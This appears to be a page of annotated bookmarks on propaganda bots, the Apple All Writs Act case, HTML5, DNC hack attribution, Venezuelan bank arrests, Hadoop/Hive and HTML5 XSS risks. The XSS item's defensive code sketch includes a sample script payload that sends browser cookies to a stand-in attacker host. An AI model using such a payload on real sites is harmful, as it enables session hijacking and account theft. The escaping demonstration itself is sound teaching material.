  • How Effective Are Automated Comments? Unfortunately, this is more effective than you might assume … Specifically, scientists have shown that name-calling and swearing breaks down people’s ability to think rationally … and intentionally sowing discord and posting junk comments to push down insightful comments  are common propaganda techniques. Indeed, an automated program need not even be that sophisticated … it can copy a couple of words from the main post or a comment, and then spew back one or more radioactive labels such as “terrorist”, “commie”, “Russia-lover”, “wimp”, “fascist”, “loser”, “traitor”, “conspiratard”, etc. Given that Harding and his compadres consider anyone who questions any U.S. policies as an enemy of the state  – as does the Obama administration (and see this) – many honest, patriotic writers and commenters may be targeted for automated propaganda comments.
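
A minimal sketch of the trigger-and-reply pattern Gizmodo describes for @AI_AGW (referenced in the note above): scan post text for known phrases and answer with a canned rebuttal plus a source link. The trigger phrases, rebuttal text, and sample posts below are placeholders, not Leck's actual bot or database.

```python
# Placeholder trigger phrases mapped to canned rebuttals, each with a source link.
CANNED_REPLIES = {
    "climate has always changed": (
        "Natural cycles do not explain the current rate of warming: "
        "https://climate.nasa.gov/evidence/"
    ),
    "no warming since": (
        "Multiple independent temperature records show continued warming: "
        "https://www.ncei.noaa.gov/"
    ),
}


def pick_reply(post_text: str) -> str | None:
    """Return a canned counter-argument if the post contains a known trigger phrase."""
    lowered = post_text.lower()
    for trigger, reply in CANNED_REPLIES.items():
        if trigger in lowered:
            return reply
    return None


posts = [
    "The climate has always changed, nothing to see here.",
    "Nice weather today.",  # no trigger phrase, so the bot stays silent
]
for post in posts:
    reply = pick_reply(post)
    if reply:
        print(f"Replying to {post!r}\n  -> {reply}")
```

A real deployment would add the polling loop ("every five minutes it trawls Twitter") and the platform API calls; the core of such a bot is just this lookup.
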
Paul Merrell

The All Writs Act, Software Licenses, and Why Judges Should Ask More Questions | Just S... - 0 views

  • Pending before federal magistrate judge James Orenstein is the government’s request for an order obligating Apple, Inc. to unlock an iPhone and thereby assist prosecutors in decrypting data the government has seized and is authorized to search pursuant to a warrant. In an order questioning the government’s purported legal basis for this request, the All Writs Act of 1789 (AWA), Judge Orenstein asked Apple for a brief informing the court whether the request would be technically feasible and/or burdensome. After Apple filed, the court asked it to file a brief discussing whether the government had legal grounds under the AWA to compel Apple’s assistance. Apple filed that brief and the government filed a reply brief last week in the lead-up to a hearing this morning.
  • We’ve long been concerned about whether end users own software under the law. Software owners have rights of adaptation and first sale enshrined in copyright law. But software publishers have claimed that end users are merely licensees, and our rights under copyright law can be waived by mass-market end user license agreements, or EULAs. Over the years, Granick has argued that users should retain their rights even if mass-market licenses purport to take them away. The government’s brief takes advantage of Apple’s EULA for iOS to argue that Apple, the software publisher, is responsible for iPhones around the world. Apple’s EULA states that when you buy an iPhone, you’re not buying the iOS software it runs, you’re just licensing it from Apple. The government argues that having designed a passcode feature into a copy of software which it owns and licenses rather than sells, Apple can be compelled under the All Writs Act to bypass the passcode on a defendant’s iPhone pursuant to a search warrant and thereby access the software owned by Apple. Apple’s supplemental brief argues that in defining its users’ contractual rights vis-à-vis Apple with regard to Apple’s intellectual property, Apple in no way waived its own due process rights vis-à-vis the government with regard to users’ devices. Apple’s brief compares this argument to forcing a car manufacturer to “provide law enforcement with access to the vehicle or to alter its functionality at the government’s request” merely because the car contains licensed software. 
  • This is an interesting twist on the decades-long EULA versus users’ rights fight. As far as we know, this is the first time that the government has piggybacked on EULAs to try to compel software companies to provide assistance to law enforcement. Under the government’s interpretation of the All Writs Act, anyone who makes software could be dragooned into assisting the government in investigating users of the software. If the court adopts this view, it would give investigators immense power. The quotidian aspects of our lives increasingly involve software (from our cars to our TVs to our health to our home appliances), and most of that software is arguably licensed, not bought. Conscripting software makers to collect information on us would afford the government access to the most intimate information about us, on the strength of some words in some license agreements that people never read. (And no wonder: The iPhone’s EULA came to over 300 pages when the government filed it as an exhibit to its brief.)
  • ...1 more annotation...
  • The government’s brief does not acknowledge the sweeping implications of its arguments. It tries to portray its requested unlocking order as narrow and modest, because it “would not require Apple to make any changes to its software or hardware, … [or] to introduce any new ability to access data on its phones. It would simply require Apple to use its existing capability to bypass the passcode on a passcode-locked iOS 7 phone[.]” But that undersells the implications of the legal argument the government is making: that anything a company already can do, it could be compelled to do under the All Writs Act in order to assist law enforcement. Were that the law, the blow to users’ trust in their encrypted devices, services, and products would be little different than if Apple and other companies were legally required to design backdoors into their encryption mechanisms (an idea the government just can’t seem to drop, its assurances in this brief notwithstanding). Entities around the world won’t buy security software if its makers cannot be trusted not to hand over their users’ secrets to the US government. That’s what makes the encryption in iOS 8 and later versions, which Apple has told the court it “would not have the technical ability” to bypass, so powerful — and so despised by the government: Because no matter how broadly the All Writs Act extends, no court can compel Apple to do the impossible.
Gary Edwards

The top 20 HTML5 sites of 2012 | Feature | .net magazine - 0 views

  •  
    Excellent review of great HTML5 Web Sites. Includes quick reviews of tools and developer services for HTML5, CSS3, Canvas/SVG, and JavaScript. (No JSON :() Includes sites offering tutorials and demonstrations of advanced, even spectacular, HTML5 builds. This is clearly the kind of resource anyone involved with advancing HTML5 would like to return to and reference as the Web pushes forward. Good Stuff Oli!!!! "2012 in review: HTML5 Doctor Oli Studholme nominates the websites that made best use of HTML5 this year, including a range of useful developer tools and online resources. Another year has flown by, bringing the requisite slew of major changes. HTML5 is on track to be a recommendation in 2014, with W3C appointing four new editors to manage the W3C's HTML5 spec and putting the HTML5 spec on GitHub; and WHATWG focusing on the HTML Living Standard. Responsive design and Twitter Bootstrap went mainstream, IE10 was released (along with seven versions of Chrome and Firefox), and browser support continues to improve. It's impossible to pick only 20 ground-breaking sites from the thousands that did truly advance our collective game, but here's my attempt. For convenience, I've grouped them according to the way in which they use HTML5."
Paul Merrell

Commentary: Don't be so sure Russia hacked the Clinton emails | Reuters - 0 views

  • By James Bamford Last summer, cyber investigators plowing through the thousands of leaked emails from the Democratic National Committee uncovered a clue. A user named “Феликс Эдмундович” modified one of the documents using settings in the Russian language. Translated, his name was Felix Edmundovich, a pseudonym referring to Felix Edmundovich Dzerzhinsky, the chief of the Soviet Union’s first secret-police organization, the Cheka. It was one more link in the chain of evidence pointing to Russian President Vladimir Putin as the man ultimately behind the operation. During the Cold War, when Soviet intelligence was headquartered in Dzerzhinsky Square in Moscow, Putin was a KGB officer assigned to the First Chief Directorate. Its responsibilities included “active measures,” a form of political warfare that included media manipulation, propaganda and disinformation. Soviet active measures, retired KGB Major General Oleg Kalugin told Army historian Thomas Boghart, aimed to discredit the United States and “conquer world public opinion.” As the Cold War has turned into the code war, Putin recently unveiled his new, greatly enlarged spy organization: the Ministry of State Security, taking the name from Joseph Stalin’s secret service. Putin also resurrected, according to James Clapper, the U.S. director of national intelligence, some of the KGB’s old active-measures tactics. On October 7, Clapper issued a statement: “The U.S. Intelligence community is confident that the Russian government directed the recent compromises of emails from U.S. persons and institutions, including from U.S. political organizations.” Notably, however, the FBI declined to join the chorus, according to reports by the New York Times and CNBC. A week later, Vice President Joe Biden said on NBC’s Meet the Press that "we're sending a message" to Putin and "it will be at the time of our choosing, and under the circumstances that will have the greatest impact." When asked if the American public would know a message was sent, Biden replied, "Hope not." Meanwhile, the CIA was asked, according to an NBC report on October 14, “to deliver options to the White House for a wide-ranging ‘clandestine’ cyber operation designed to harass and ‘embarrass’ the Kremlin leadership.” But as both sides begin arming their cyberweapons, it is critical for the public to be confident that the evidence is really there, and to understand the potential consequences of a tit-for-tat cyberwar escalating into a real war. (A minimal code sketch of how such document metadata can be read appears at the end of this item.)
  • This is a prospect that has long worried Richard Clarke, the former White House cyber czar under President George W. Bush. “It’s highly likely that any war that began as a cyberwar,” Clarke told me last year, “would ultimately end up being a conventional war, where the United States was engaged with bombers and missiles.” The problem with attempting to draw a straight line from the Kremlin to the Clinton campaign is the number of variables that get in the way. For one, there is little doubt about Russian cyber fingerprints in various U.S. campaign activities. Moscow, like Washington, has long spied on such matters. The United States, for example, inserted malware in the recent Mexican election campaign. The question isn’t whether Russia spied on the U.S. presidential election, it’s whether it released the election emails. Then there’s the role of Guccifer 2.0, the person or persons supplying WikiLeaks and other organizations with many of the pilfered emails. Is this a Russian agent? A free agent? A cybercriminal? A combination, or some other entity? No one knows. There is also the problem of groupthink that led to the war in Iraq. For example, just as the National Security Agency, the Central Intelligence Agency and the rest of the intelligence establishment are convinced Putin is behind the attacks, they also believed it was a slam-dunk that Saddam Hussein had a trove of weapons of mass destruction. Consider as well the speed of the political-hacking investigation, followed by a lack of skepticism, culminating in a rush to judgment. After the Democratic committee discovered the potential hack last spring, it called in the cybersecurity firm CrowdStrike in May to analyze the problem.
  • CrowdStrike took just a month or so to conclusively determine that Russia’s FSB, the successor to the KGB, and the Russian military intelligence organization, GRU, were behind it. Most of the other major cybersecurity firms quickly fell in line and agreed. By October, the intelligence community made it unanimous. That speed and certainty contrast sharply with a previous suspected Russian hack in 2010, when the target was the Nasdaq stock market. According to an extensive investigation by Bloomberg Businessweek in 2014, the NSA and FBI made numerous mistakes over many months that stretched to nearly a year. “After months of work,” the article said, “there were still basic disagreements in different parts of government over who was behind the incident and why.” There was no consensus, with just a 70 percent certainty that the hack was a cybercrime. Months later, this determination was revised again: It was just a Russian attempt to spy on the exchange in order to design its own. The federal agents also considered the possibility that the Nasdaq snooping was not connected to the Kremlin. Instead, “someone in the FSB could have been running a for-profit operation on the side, or perhaps sold the malware to a criminal hacking group.” Again, that’s why it’s necessary to better understand the role of Guccifer 2.0 in releasing the Democratic National Committee and Clinton campaign emails before launching any cyberweapons.
  • ...2 more annotations...
  • It is strange that clues in the Nasdaq hack were very difficult to find ― as one would expect from a professional, state-sponsored cyber operation. Conversely, the sloppy, Inspector Clouseau-like nature of the Guccifer 2.0 operation, with someone hiding behind a silly Bolshevik cover name, and Russian language clues in the metadata, smacked more of either an amateur operation or a deliberate deception. Then there’s the Shadow Brokers, that mysterious person or group that surfaced in August with its farcical “auction” to profit from a stolen batch of extremely secret NSA hacking tools, in essence, cyberweapons. Where do they fit into the picture? They have a small armory of NSA cyberweapons, and they appeared just three weeks after the first DNC emails were leaked. On Monday, the Shadow Brokers released more information, including what they claimed is a list of hundreds of organizations that the NSA has targeted over more than a decade, complete with technical details. This offers further evidence that their information comes from a leaker inside the NSA rather than the Kremlin. The Shadow Brokers also discussed Obama’s threat of cyber retaliation against Russia. Yet they seemed most concerned that the CIA, rather than the NSA or Cyber Command, was given the assignment. This may indicate a connection to the NSA’s elite hacking group, Tailored Access Operations, considered by many the A-Team of hackers. “Why is DirtyGrandpa threating CIA cyberwar with Russia?” they wrote. “Why not threating with NSA or Cyber Command? CIA is cyber B-Team, yes? Where is cyber A-Team?” Because of legal and other factors, the NSA conducts cyber espionage, Cyber Command conducts cyberattacks in wartime, and the CIA conducts covert cyberattacks.
  • The Shadow Brokers connection is important because Julian Assange, the founder of WikiLeaks, claimed to have received identical copies of the Shadow Brokers cyberweapons even before they announced their “auction.” Did he get them from the Shadow Brokers, from Guccifer, from Russia or from an inside leaker at the NSA? Despite the rushed, incomplete investigation and unanswered questions, the Obama administration has announced its decision to retaliate against Russia. But a public warning about a secret attack makes little sense. If a major cyber crisis happens in Russia sometime in the future, such as a deadly power outage in frigid winter, the United States could be blamed even if it had nothing to do with it. That could then trigger a major retaliatory cyberattack against the U.S. cyber infrastructure, which would call for another reprisal attack ― potentially leading to Clarke’s fear of a cyberwar triggering a conventional war. President Barack Obama has also not taken a nuclear strike off the table as an appropriate response to a devastating cyberattack.
  •  
    Article by James Bamford, the first NSA whistleblower and author of three books on the NSA.
Paul Merrell

Venezuelan Intelligence Services Arrest Credicard Directors - nsnbc international | nsn... - 0 views

  • Venezuelan President Nicolas Maduro confirmed Saturday that the state intelligence service SEBIN arrested several directors from the Credicard financial transaction company on Friday night. 
  • The financial consortium is accused of deliberately taking advantage of a series of cyber attacks on state internet provider CANTV on Friday to paralyse its online payment platform, which is responsible for the majority of the country’s accredited financial transactions, according to its website. “We have proof that what Credicard did yesterday was a deliberate act. Right now the main people responsible at Credicard are under arrest,” the president confirmed. The government says that millions of attempted purchases using in-store credit and debit card payment machines provided by the company were interrupted after its platform went down for most of the day. Authorities also maintain that the company waited longer than the established protocol of one hour before responding to the issues.
  • According to CANTV President Manuel Fernandez, Venezuela’s internet platform suffered at least three attacks from an external source on Friday, one of which was aimed at state oil company PDVSA. CANTV was notified of the attacks by international provider LANautilus, which belongs to Telecom Italia. Nonetheless, Fernandez denied that Credicard’s platform was affected by the interference with CANTV’s service, underscoring that other financial transaction companies that rely on the state enterprise remained operational.
  • ...1 more annotation...
  • On Friday, SEBIN Director Gustavo Gonzalez Lopez also openly accused members of the right-wing coalition, the Democratic Unity Roundtable (MUD), of being implicated in the incident. “Members of the MUD involved in the attack on electronic banking service,” he tweeted. “The financial war continues inside and outside the country; internally they are damaging banking operability,” he added. Venezuelan news source La Iguana has reported that Credicard’s server administrator is the company Dayco Host, which belongs to the D’Agostino family. Diana D’Agostino is married to veteran opposition politician Henry Ramos Allup, president of the National Assembly. On Saturday, the government-promoted Productive Economy Council held an extraordinary meeting of political and business representatives to reject the attack on the country’s financial system.
Gary Edwards

Matt On Stuff: Hadoop For The Rest Of Us - 0 views

  •  
    Excellent Hadoop/Hive explanation.  Hat tip to Matt Asay for the link.  I left a comment on Matt's blog questioning the consequences of the Oracle vs. Google Android lawsuit, and the possible enforcement of the Java API copyright claim against Hadoop/Hive.  Based on this explanation of Hadoop/Hive, I'm wondering if Oracle is making a move to claim the entire era of Big Data Cloud Computing?  To understand why, it's first necessary to read Matt's explanation.   kill shot excerpt: "You've built your Hadoop job, and have successfully processed the data. You've generated some structured output, and that resides on HDFS. Naturally you want to run some reports, so you load your data into a MySQL or an Oracle database. Problem is, the data is large. In fact it's so large that when you try to run a query against the table you've just created, your database begins to cry. If you listen to its sobs, you'll probably hear "I was built to process Megabytes, maybe Gigabytes of data. Not Terabytes. Not Petabytes. That's not my job. I was built in the 80's and 90's, back when floppy drives were used. Just leave me alone". "This is where Hive comes to the rescue. Hive lets you run an SQL statement against structured data stored on HDFS. When you issue an SQL query, it parses it, and translates it into a Java Map/Reduce job, which is then executed on your data. Although Hive does some optimizations, in general it just goes record by record against all your data. This means that it's relatively slow - a typical Hive query takes 5 or 10 minutes to complete, depending on how much data you have. However, that's what makes it effective. Unlike a relational database, you don't waste time on query optimization, adding indexes, etc. Instead, what keeps the processing time down is the fact that the query is run on all machines in your Hadoop cluster, and the scalability is taken care of for you." "Hive is extremely useful in data-warehousing kind of scenarios. You would
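    To make the SQL-to-Map/Reduce translation described above concrete, here is a minimal, hypothetical sketch in the Hadoop Streaming style - not code from Matt's post and not what Hive literally emits. It shows roughly what a simple GROUP BY query such as SELECT page, COUNT(*) FROM logs GROUP BY page boils down to: a mapper that emits one key per record and a reducer that sums per key. The tab-separated input layout, the script name and the command-line handling are all assumptions for illustration.

        #!/usr/bin/env python3
        # Hypothetical Hadoop Streaming job approximating what Hive generates for:
        #   SELECT page, COUNT(*) FROM logs GROUP BY page;
        # Assumes tab-separated log records on stdin with the page name in column 1.
        import sys

        def mapper():
            # Emit "page<TAB>1" for every input record.
            for line in sys.stdin:
                fields = line.rstrip("\n").split("\t")
                if fields and fields[0]:
                    print(fields[0] + "\t1")

        def reducer():
            # Hadoop sorts mapper output by key, so all counts for one page arrive together.
            current_page, count = None, 0
            for line in sys.stdin:
                page, value = line.rstrip("\n").split("\t")
                if page != current_page and current_page is not None:
                    print(current_page + "\t" + str(count))
                    count = 0
                current_page = page
                count += int(value)
            if current_page is not None:
                print(current_page + "\t" + str(count))

        if __name__ == "__main__":
            # Invoked by Hadoop Streaming, e.g. with -mapper "hive_sketch.py map"
            # and -reducer "hive_sketch.py reduce" (names assumed for illustration).
            mapper() if "map" in sys.argv[1:] else reducer()

    Hive's value is that it writes and ships this kind of job for you and runs it on every node in the cluster, which is exactly the slow-per-query but scalable behaviour described in the excerpt.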
Gary Edwards

Discoverer of JSON Recommends Suspension of HTML5 | Web Security Journal - 0 views

  •  
    Fascinating conversation between Douglas Crockford and Jeremy Geelan. The issues are XSS - the cross-site scripting exposure inherent in HTML's scripting capabilities - and "the painful gap" in the HTML5 specification of the interface between JavaScript and the browser. I had to use the Evernote Clearly Chrome extension to read this page. Microsoft is running a huge JavaScript advertisement/pointer that totally blocks the page with no way of closing or escaping. Incredible. Clearly was able to knock it out though. Nicely done! The HTML5-XSS problem is very important, especially if you're someone like me who sees the HTML+ format (HTML5-CSS3-JSON-JavaScript-SVG/Canvas) as the undisputed Cloud Productivity Platform "compound document" model. The XSS discussion goes right to the heart of the matter of creating an HTML compound document in much the same way that an MSOffice Productivity Compound Document worked. XSS mimics the functionality of embedded compound document components such as OLE, DDE, ODBC and scripting. Crack open any client/server business document and it will be found to be loaded with these embedded components. It seems to me that any one of the Cloud Productivity Platform contenders could solve the HTML-XSS problem. I'm thinking Google Apps, Zoho, SalesForce.com, RackSpace and Amazon - with gApps and Zoho clearly leading the charge. Also let me add that RSS and XMPP (Jabber), while not normally mentioned with JSON, ought to be considered. Twitter uses RSS to transport and connect data. Jabber is of course a long-time favorite of mine. excerpt: The fundamental mistake in HTML5 was one of prioritization. It should have tackled the browser's most important problem first. Once the platform was secured, then shiny new features could be carefully added. There is much that is attractive about HTML5. But ultimately the thing that made the browser into a credible application delivery system was JavaScript, the ultimate workaround tool. There is a painful gap
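    As a footnote to the XSS point above, here is a minimal, hypothetical sketch - not taken from the Crockford interview - of the failure mode being discussed and the routine mitigation: untrusted text has to be escaped before it is concatenated into HTML or handed to a script block. The function names and the sample payload are invented for illustration.

        # Minimal XSS sketch: untrusted input dropped into markup versus escaped first.
        import html
        import json

        def render_comment_unsafe(comment):
            # Vulnerable: attacker-controlled text becomes live markup.
            return "<div class='comment'>" + comment + "</div>"

        def render_comment_safe(comment):
            # html.escape neutralizes <, >, & and quotes, so the payload renders as inert text.
            return "<div class='comment'>" + html.escape(comment, quote=True) + "</div>"

        def embed_json_for_script(data):
            # When passing server-side data to JavaScript, serialize it and escape the
            # characters that could otherwise close the surrounding <script> element.
            payload = json.dumps(data)
            payload = payload.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")
            return "<script>var APP_DATA = " + payload + ";</script>"

        if __name__ == "__main__":
            attack = "<script>new Image().src='//evil.example/?c='+document.cookie</script>"
            print(render_comment_unsafe(attack))   # script tag survives intact: XSS
            print(render_comment_safe(attack))     # rendered harmlessly as text
            print(embed_json_for_script({"msg": attack}))

    The point of the sketch is that this escaping discipline is currently left to every application author, which is the prioritization gap the excerpt complains about: the platform ships shiny features while the basic injection problem remains the developer's job.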